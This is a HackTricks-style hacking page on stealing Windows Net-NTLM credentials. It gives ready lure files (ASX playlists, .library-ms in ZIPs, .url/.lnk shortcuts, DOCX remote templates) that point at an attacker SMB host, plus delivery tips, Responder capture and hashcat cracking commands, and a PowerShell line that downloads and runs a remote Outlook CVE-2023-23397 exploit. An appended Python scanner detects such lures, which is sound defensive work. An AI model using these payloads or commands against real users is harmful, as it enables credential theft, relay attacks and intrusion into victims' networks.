Places to steal NTLM creds
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Check all the great ideas in https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ (from the download of a Microsoft Word file online onwards) and the NTLM leak sources https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and https://github.com/p0dalirius/windows-coerced-authentication-methods.
Windows Media Player playlists (.ASX/.WAX)
If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net-NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.
Example payload:
```xml
<asx version="3.0">
  <title>Leak</title>
  <entry>
    <title></title>
    <ref href="file://ATTACKER_IP\share\track.mp3" />
  </entry>
</asx>
```
Collection and cracking flow:
```bash
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```
ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer insecurely handles .library-ms files when they are opened directly from within a ZIP archive. If the library definition points to a remote UNC path (e.g., \\attacker\share), simply browsing/launching the .library-ms inside the ZIP causes Explorer to enumerate the UNC and emit NTLM authentication to the attacker. This yields a NetNTLMv2 that can be cracked offline or potentially relayed.
Minimal .library-ms pointing to an attacker UNC:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <name>Company Documents</name>
  <isLibraryPinned>false</isLibraryPinned>
  <iconReference>shell32.dll,-235</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.10.14.2\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```
Operational steps
- Create the .library-ms file with the XML above (set your IP/hostname).
- Zip it (on Windows: Send to → Compressed (zipped) folder) and deliver the ZIP to the target.
- Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP.
Outlook calendar reminder sound path (CVE-2023-23397): zero-click Net-NTLMv2 leak
Microsoft Outlook for Windows processed the extended MAPI property PidLidReminderFileParameter in calendar items. If that property points to a UNC path (e.g., \\attacker\share\alert.wav), Outlook would contact the SMB share when the reminder fires, leaking the user's Net-NTLMv2 without any click. This was patched on March 14, 2023, but it's still highly relevant for legacy/unpatched fleets and for historical incident response.
Quick exploitation with PowerShell (Outlook COM):
```powershell
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
```
Listener side:
```bash
sudo responder -I eth0 # or impacket-smbserver to observe connections
```
Notes
- A victim only needs Outlook for Windows running when the reminder triggers.
- The leak yields Net-NTLMv2 suitable for offline cracking or relay (not pass-the-hash).
.LNK/.URL icon-based zero-click NTLM leak (CVE-2025-50154, bypass of CVE-2025-24054)
Windows Explorer renders shortcut icons automatically. Recent research showed that even after Microsoft's April 2025 patch for UNC-icon shortcuts, it was still possible to trigger NTLM authentication with no clicks by hosting the shortcut target on a UNC path and keeping the icon local (patch bypass assigned CVE-2025-50154). Merely viewing the folder causes Explorer to retrieve metadata from the remote target, emitting NTLM to the attacker SMB server.
Minimal Internet Shortcut payload (.url):
```ini
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
```
Program Shortcut payload (.lnk) via PowerShell:
```powershell
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\Windows\System32\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
```
Delivery ideas
- Drop the shortcut in a ZIP and get the victim to browse it.
- Place the shortcut on a writable share the victim will open.
- Combine with other lure files in the same folder so Explorer previews the items.
Office remote template injection (.docx/.dotm) to coerce NTLM
Office documents can reference an external template. If you set the attached template to a UNC path, opening the document will authenticate to SMB.
Minimal DOCX relationship changes (inside word/):
- Edit word/settings.xml and add the attached template reference:
```xml
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
```
- Edit word/_rels/settings.xml.rels and point rId1337 to your UNC:
```xml
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\10.10.14.2\share\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
```
- Repack to .docx and deliver. Run your SMB capture listener and wait for the open.
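From the defender's side, the lure formats covered above (.asx/.wax playlists, .library-ms inside ZIPs, .url shortcuts and .docx attached-template relationships) all leave a remote UNC reference in plain text or XML, so a mail gateway or triage pipeline can flag them before a user ever opens the file. The following Python scanner is an added example, not code from the original page or from any of the referenced tools; the function names, the regex and the sample files are my own assumptions, and binary .lnk files are out of scope.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET
# \\host\share... or file://host\share... (the reference forms used by the lures above)
UNC_RE = re.compile(r'''(?:\\\\|file://)[A-Za-z0-9.@_-]+[\\/][^\s"'<>]*''')
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def unc_refs(text):
    """Return every UNC-style reference found in a text blob."""
    return UNC_RE.findall(text)

def scan_bytes(name, data):
    """Inspect one file and return (file, where, reference) for each remote reference."""
    lname = name.lower()
    findings = []
    if lname.endswith((".zip", ".docx", ".dotx", ".dotm")):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                inner = zf.read(member)
                if lname.endswith(".zip"):
                    findings += scan_bytes(member, inner)  # lure files delivered inside a ZIP
                elif member == "word/_rels/settings.xml.rels":  # attached-template relationship
                    for rel in ET.fromstring(inner).iter(REL_NS + "Relationship"):
                        target = rel.get("Target", "")
                        if rel.get("TargetMode") == "External" and unc_refs(target):
                            kind = "settings.xml.rels " + rel.get("Type", "").rsplit("/", 1)[-1]
                            findings.append((name, kind, target))
        return findings
    if lname.endswith(".library-ms"):  # <simpleLocation><url> pointing at a UNC
        for url in ET.fromstring(data).iter(LIB_NS + "url"):
            if unc_refs(url.text or ""):
                findings.append((name, "library-ms simpleLocation", url.text))
    elif lname.endswith((".asx", ".wax")):  # playlists are often not strict XML: regex the text
        for ref in unc_refs(data.decode("utf-8", errors="replace")):
            findings.append((name, "asx reference", ref))
    elif lname.endswith(".url"):  # INI-style InternetShortcut: URL= and IconFile= keys
        for line in data.decode("utf-8", errors="replace").splitlines():
            key, _, val = line.partition("=")
            if key.strip().lower() in ("url", "iconfile") and unc_refs(val.strip()):
                findings.append((name, "InternetShortcut " + key.strip(), val.strip()))
    return findings

def pack_zip(entries):
    """Build an in-memory ZIP/DOCX from {member_name: bytes}; used here only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, content in entries.items():
            zf.writestr(member, content)
    return buf.getvalue()
```

A local icon path such as C:\Windows\System32\SHELL32.dll or a plain http:// URL produces no finding, so only references that would cause an outbound SMB authentication are reported.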
For post-capture ideas on relaying or abusing NTLM, check:
References
- HTB Fluffy - ZIP .library-ms auth leak (CVE-2025-24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
- HTB: Media - WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
- Morphisec - 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC - Microsoft mitigates Outlook EoP (CVE-2023-23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate - Zero-click, one NTLM: Microsoft security patch bypass (CVE-2025-50154)